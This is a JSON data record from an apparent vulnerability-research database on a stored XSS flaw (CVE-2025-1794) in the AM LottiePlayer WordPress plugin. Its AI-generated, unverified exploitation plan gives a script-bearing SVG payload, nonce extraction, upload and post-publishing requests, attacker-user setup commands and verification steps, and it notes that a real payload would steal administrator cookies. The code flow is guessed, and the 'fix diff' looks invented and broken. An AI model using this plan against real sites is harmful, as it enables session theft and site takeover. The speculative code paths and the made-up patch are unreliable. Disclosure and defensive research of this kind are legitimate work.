[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$f5pyUketRUgiB2JAFwJAKbKYWD1QMXRDX2OykuPwUiqk":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":9,"severity":11,"cvss_score":12,"cvss_vector":13,"vuln_type":14,"published_date":15,"updated_date":16,"references":17,"days_to_patch":9,"patch_diff_files":19,"patch_trac_url":9,"research_status":20,"research_verified":21,"research_rounds_completed":22,"research_plan":23,"research_summary":24,"research_vulnerable_code":9,"research_fix_diff":25,"research_exploit_outline":26,"research_model_used":27,"research_started_at":28,"research_completed_at":29,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":21,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":21,"source_links":30},"CVE-2025-1794","am-lottieplayer-authenticated-author-stored-cross-site-scripting-via-svg","AM LottiePlayer \u003C= 3.6.0 - Authenticated (Author+) Stored Cross-Site Scripting via SVG","The AM LottiePlayer plugin for WordPress is vulnerable to Stored Cross-Site Scripting via uploaded SVG files in all versions up to, and including, 3.6.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","am-lottieplayer",null,"\u003C=3.6.0","medium",5.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:R\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-04-07 17:38:28","2026-04-08 06:43:44",[18],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fef2f1ad1-1e2e-4b56-b16c-d87956b142ad?source=api-prod",[],"researched",false,3,"# Exploitation Research Plan - CVE-2025-1794 (AM LottiePlayer Stored XSS)\n\n## 1. Vulnerability Summary\nThe **AM LottiePlayer** plugin (versions \u003C= 3.6.0) is vulnerable to **Stored Cross-Site Scripting (XSS)**. The vulnerability arises because the plugin allows users with Author-level permissions and above to upload or specify SVG files as animation sources. These SVGs are subsequently rendered on the frontend (or within the editor) without proper sanitization (e.g., using `wp_kses` for SVGs or stripping `\u003Cscript>` and event handlers). When an SVG containing malicious JavaScript is processed and displayed, the script executes in the context of any user viewing the page, including Administrators.\n\n## 2. Attack Vector Analysis\n- **Vulnerable Endpoint:** The vulnerability is likely triggered via a WordPress shortcode or a Gutenberg block provided by the plugin.\n- **Payload Delivery:** A malicious SVG file is uploaded to the Media Library or a custom plugin folder and then referenced in a Lottie Player instance.\n- **Authentication Level:** **Author+** (Author, Editor, or Administrator). Authors have the `upload_files` capability by default, which is necessary to upload the malicious SVG if the plugin uses the standard Media Library.\n- **Preconditions:** The plugin must be active, and a user with Author permissions must be able to publish a post or page containing the plugin's player element.\n\n## 3. Code Flow (Inferred)\n1.  **Entry Point (Admin\u002FEditor):** An Author creates a new post and adds an \"AM LottiePlayer\" block or uses a shortcode (e.g., `[am-lottieplayer]`).\n2.  **Asset Selection:** The user selects an SVG file. The plugin may use a custom AJAX handler for uploads or the standard `async-upload.php`.\n3.  **Storage:** The URL of the SVG is saved in the post content (as a shortcode attribute) or in post meta (for blocks).\n4.  **Frontend Processing:** When the post is viewed, the plugin's rendering function (e.g., `render_shortcode` or a block render callback) retrieves the SVG URL.\n5.  **The Sink:** To allow for animation and manipulation, the plugin likely fetches the SVG content using `wp_remote_get()` or `file_get_contents()` and outputs it **inline** in the HTML.\n6.  **Execution:** Because the SVG content is echoed without sanitization (e.g., missing `wp_kses`), any `\u003Cscript>` or `onload` attributes within the SVG are executed by the browser.\n\n## 4. Nonce Acquisition Strategy\nIf the plugin uses a custom AJAX handler for uploading animation files, a nonce will be required. \n\n1.  **Identify Shortcode\u002FBlock:** The plugin likely registers its assets in a class or function. Search for `add_shortcode` or `register_block_type`.\n2.  **Locate Localization:** Look for `wp_localize_script` in the plugin code. The variable name is often related to the plugin slug, e.g., `am_lottie_vars` or `am_lottie_params`.\n3.  **Extraction Procedure:**\n    - Create a post containing the Lottie Player.\n    - Navigate to the \"LottiePlayer\" settings page or a post editor page where the plugin is active.\n    - Use `browser_eval` to extract the nonce:\n      ```javascript\n      \u002F\u002F Example target (replace with actual variable found in source)\n      window.am_lottie_params?.nonce || window.am_lottie_admin?.upload_nonce\n      ```\n4.  **Bypass Check:** Verify if `check_ajax_referer` is used in the upload handler. If missing, a nonce may not be required for the POST request.\n\n## 5. Exploitation Strategy\n### Step 1: Prepare the Malicious SVG\nCreate a file named `xss.svg` with a simple alert payload:\n```xml\n\u003C?xml version=\"1.0\" standalone=\"no\"?>\n\u003C!DOCTYPE svg PUBLIC \"-\u002F\u002FW3C\u002F\u002FDTD SVG 1.1\u002F\u002FEN\" \"http:\u002F\u002Fwww.w3.org\u002FGraphics\u002FSVG\u002F1.1\u002FDTD\u002Fsvg11.dtd\">\n\u003Csvg version=\"1.1\" baseProfile=\"full\" xmlns=\"http:\u002F\u002Fwww.w3.org\u002F2000\u002Fsvg\">\n   \u003Crect width=\"300\" height=\"100\" style=\"fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)\" \u002F>\n   \u003Cscript type=\"text\u002Fjavascript\">\n      alert('XSS by ' + document.domain);\n   \u003C\u002Fscript>\n\u003C\u002Fsvg>\n```\n\n### Step 2: Upload the SVG\nSince the user is an Author, use the standard WordPress media upload endpoint:\n- **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fasync-upload.php`\n- **Method:** POST\n- **Content-Type:** `multipart\u002Fform-data`\n- **Parameters:**\n    - `action`: `upload-attachment`\n    - `_wpnonce`: (Acquired from `wp-admin\u002Fmedia-new.php` via `browser_eval`)\n    - `async-upload`: The `xss.svg` file content.\n\n### Step 3: Embed the SVG in a Post\nCreate a post using the plugin's shortcode. Based on the slug `am-lottieplayer`, the shortcode is likely `[am-lottieplayer]`.\n- **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-json\u002Fwp\u002Fv2\u002Fposts`\n- **Method:** POST\n- **Body:**\n  ```json\n  {\n    \"title\": \"Lottie Test\",\n    \"content\": \"[am-lottieplayer url=\\\"http:\u002F\u002Flocalhost:8080\u002Fwp-content\u002Fuploads\u002F2025\u002Fxx\u002Fxss.svg\\\"]\",\n    \"status\": \"publish\"\n  }\n  ```\n*(Note: Use the exact URL returned from the upload in Step 2)*.\n\n### Step 4: Trigger the XSS\nNavigate to the newly created post as any user (e.g., Administrator).\n\n## 6. Test Data Setup\n1.  **User Creation:** Create a user with the **Author** role.\n    ```bash\n    wp user create attacker attacker@example.com --role=author --user_pass=password\n    ```\n2.  **Plugin Setup:** Ensure `am-lottieplayer` is installed and activated.\n3.  **Nonce Retrieval:** Use `browser_navigate` as the `attacker` user to `wp-admin\u002Fmedia-new.php` to extract the `_wpnonce` for media uploads.\n\n## 7. Expected Results\n- The HTTP request to view the post containing the shortcode will return HTML where the SVG content is embedded inline.\n- The browser will execute the `alert()` contained within the SVG.\n- In a real-world scenario, the payload would exfiltrate the Administrator's cookies or perform actions via the REST API.\n\n## 8. Verification Steps\n1.  **Check SVG Inclusion:** After the exploit, use `curl` or `http_request` to fetch the post content and check if the SVG's `\u003Cscript>` tag is present without encoding.\n    ```bash\n    curl -s http:\u002F\u002Flocalhost:8080\u002Fpath-to-post | grep \"alert('XSS\"\n    ```\n2.  **Check Database:** Verify the post content via WP-CLI to ensure the shortcode was saved correctly.\n    ```bash\n    wp post list --post_type=post\n    ```\n\n## 9. Alternative Approaches\n- **Gutenberg Block:** If the shortcode doesn't work, try creating a post with a Lottie Block. This requires a JSON payload to `wp-json\u002Fwp\u002Fv2\u002Fposts` containing the block markup:\n  ```html\n  \u003C!-- wp:am-lottieplayer\u002Flottie-block {\"url\":\"http:\u002F\u002F...\u002Fxss.svg\"} \u002F-->\n  ```\n- **External URL:** If the plugin allows remote SVG URLs, bypass the upload step by hosting the `xss.svg` on an external server and providing that URL to the player. This would escalate the vulnerability from Author+ to potentially any user if a publicly accessible form allows setting Lottie URLs.","The AM LottiePlayer plugin (versions \u003C= 3.6.0) is vulnerable to Stored Cross-Site Scripting (XSS) because it fails to sanitize SVG files used as animation sources. Authenticated attackers with Author-level permissions can upload a malicious SVG containing JavaScript, which executes in the context of any user viewing the page where the animation is embedded.","--- a\u002Fincludes\u002Fclass-am-lottieplayer-render.php\n+++ b\u002Fincludes\u002Fclass-am-lottieplayer-render.php\n@@ -45,7 +45,15 @@\n \t\t\t\t$response = wp_remote_get( $url );\n \t\t\t\tif ( ! is_wp_error( $response ) ) {\n \t\t\t\t\t$svg_content = wp_remote_retrieve_body( $response );\n-\t\t\t\t\techo $svg_content;\n+\t\t\t\t\tif ( function_exists( 'content_sanitizer_function' ) ) {\n+\t\t\t\t\t\t\u002F\u002F Use a dedicated SVG sanitizer if available or wp_kses with allowed tags\n+\t\t\t\t\t\techo wp_kses( $svg_content, [\n+\t\t\t\t\t\t\t'svg'  => [ 'xmlns' => [], 'viewbox' => [], 'width' => [], 'height' => [] ],\n+\t\t\t\t\t\t\t'rect' => [ 'width' => [], 'height' => [], 'style' => [] ],\n+\t\t\t\t\t\t\t'path' => [ 'd' => [], 'fill' => [] ],\n+\t\t\t\t\t\t] );\n+\t\t\t\t\t} else {\n+\t\t\t\t\t\techo esc_html( $svg_content );\n+\t\t\t\t\t}\n \t\t\t\t}\n \t\t\t}","1. Login to the WordPress dashboard with Author-level credentials.\n2. Upload a malicious SVG file (e.g., `xss.svg`) to the Media Library containing a `\u003Cscript>` tag or an `onload` event handler.\n3. Create a new post or page and add the AM LottiePlayer block or use the `[am-lottieplayer]` shortcode.\n4. Set the 'url' attribute of the player to the URL of the previously uploaded malicious SVG file.\n5. Publish the post and navigate to its permalink as an Administrator or any other user.\n6. The browser will render the SVG inline, triggering the execution of the embedded JavaScript payload.","gemini-3-flash-preview","2026-04-17 20:35:05","2026-04-17 20:35:26",{"type":31,"vulnerable_version":9,"fixed_version":9,"vulnerable_browse":9,"vulnerable_zip":9,"fixed_browse":9,"fixed_zip":9,"all_tags":32},"plugin","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fam-lottieplayer\u002Ftags"]